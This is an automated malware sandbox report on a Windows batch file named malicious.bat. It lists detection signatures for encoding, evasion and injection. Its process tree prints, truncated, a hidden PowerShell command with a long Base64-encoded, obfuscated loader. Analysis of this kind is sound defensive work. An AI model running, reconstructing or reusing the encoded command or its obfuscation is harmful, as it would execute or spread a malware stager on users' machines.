Windows
Analysis Report
malicious.bat
Overview
General Information
Detection
Score: 60
Range: 0 - 100
Confidence: 100%
Signatures
Antivirus detection for URL or domain
Encrypted powershell cmdline option found
Joe Sandbox ML detected suspicious sample
Sigma detected: Suspicious PowerShell Parameter Substring
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Usage Of Web Request Commands And Cmdlets
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Classification
- System is w10x64native
- cmd.exe (PID: 2900, cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\malicious.bat" ", MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 5084, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
- powershell.exe (PID: 7232, cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 powershell -w h -e ZgB1AG4AYwB0AGkAbwBuACAAYgBEAFgAdgBWACgAJABrAEMAcgBiAHgAKQAgAHsAcgBlAHQAdQByAG4AIABbAGMAaABhAHIAXQA6ADoAQwBvAG4AdgBlAHIAdABGAHIAbwBtAFUAdABmADMAMgAoACQAawBDAHIAYgB4ACkAfQAmACgAKABiAEQAWAB2AFYAKAAwAHgANgA5ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYANQApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADgAKQApACkAKAAoAGIARABYAHYAVgAoADAAeAA1ADMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwA0ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAMQApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADIAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwA0ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADIAZAApACkAKwAoAGIARABYAHYAVgAoADAAeAA1ADAAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwAyACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAZgApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgA1ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADcAMwApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMgAwACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADIAMgApACkAKwAoAGIARABYAHYAVgAoADAAeAAyADQAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgA1ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAZQApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADYAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMwBhACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADUANwApACkAKwAoAGIARABYAHYAVgAoADAAeAA0ADkAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANABlACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADQANAApACkAKwAoAGIARABYAHYAVgAoADAAeAA0ADkAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANQAyACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADUAYwApACkAKwAoAGIARABYAHYAVgAoADAAeAA1ADMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwA5ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADcAMwApACkAKwAoAGIARABYAHYAVgAoADAAeAA1ADcAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANABmACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADUANwApACkAKwAoAGIARABYAHYAVgAoADAAeAAzADYAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMwA0ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADUAYwApACkAKwAoAGIARABYAHYAVgAoADAAeAA1ADcAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgA5ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAZQApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADQAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgBmACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADcANwApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANQAwACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAZgApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADcAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgA1ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADcAMgApACkAKwAoAGIARABYAHYAVgAoADAAeAA1ADMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgA4ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYANQApACkAKwAoAGIARABYAHYAVgAoADAAeAA2AGMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgBjACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADUAYwApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADYAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMwAxACkAKQArACgAYg